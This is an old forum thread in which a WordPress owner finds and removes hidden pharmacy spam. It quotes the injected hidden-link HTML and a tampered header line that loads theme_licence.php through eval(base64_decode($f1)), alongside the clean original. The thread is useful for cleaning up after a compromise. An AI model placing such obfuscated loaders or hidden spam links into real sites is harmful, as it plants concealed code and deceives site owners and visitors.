Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Wordpress hidden spam

Options
  • 09-05-2009 8:22pm
    #1
    kc66
    Registered Users Posts: 2,267 ✭✭✭


    I have a site done using Wordpress. I noticed the word cialis when looking at webmaster tools. When I checked the source code there was a spam link.

    [HTML]<body>
    <div id="begin_template"><a href="[link was here]">Generic Cialis</a></div><script language="javascript">
    document.getElementById("begin_template").style.display="none";
    </script><div class="wrapper">
    <div class="menu">[/HTML]

    I have checked all the files in the theme and cannot find this link anywhere. Any pointers on where I will find it?
    I have the permissions on the files set to 644 so not sure how this happened either.

    Thanks.


Comments

  • Options
    #2
    louie
    Closed Accounts Posts: 1,200 ✭✭✭louie


    probably in the footer of the template - could be encoded text
    or a comment


  • Options
    #3
    kc66
    Registered Users Posts: 2,267 ✭✭✭kc66


    Its not the footer. Its short and I have double checked it.


  • Options
    #4
    kc66
    Registered Users Posts: 2,267 ✭✭✭kc66


    I eventually found this in the db table wp_options. Deleted it but it has come back again.


  • Options
    #5
    Axwell
    Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Is there a file called theme_licence.php or start_template.php with encrypted code in it?

    I had the same problem with one recently and the encrypted code contained the spam which was then called as a function and pasted inside my header, you wouldnt see it unless you higlighted the page as the text was white on a white header background.


  • Options
    #6
    kc66
    Registered Users Posts: 2,267 ✭✭✭kc66


    I compared these 2 files to the original theme files and they are the exact same. So no extra code in either. Unless they are part of the theme which I doubt, then this is not the problem.


  • Advertisement
  • Options
    #7
    Axwell
    Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Was the code in those files encrypted or not?
    Did you check index.php and see what the first div tag called in is as from the code you put this is the first thing after the <body> tag.
    Check the functions file aswell and see what functions it has..maybe post the contents of that here or a link to your url.


  • Options
    #8
    kc66
    Registered Users Posts: 2,267 ✭✭✭kc66


    I think I found it. There was an extra piece of code in the header that wasn't in the original theme file:

    [PHP]<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    In the theme file I originally had:

    [PHP]<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    After it was removed the spam link has not come back so hopefully this is it.


  • Options
    #9
    Axwell
    Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Thats what i said to you earlier, too look for theme_license and see was there encryped code in it.
    eval(base64_decode)is a function used to decrypt it and put that link in the header.


Advertisement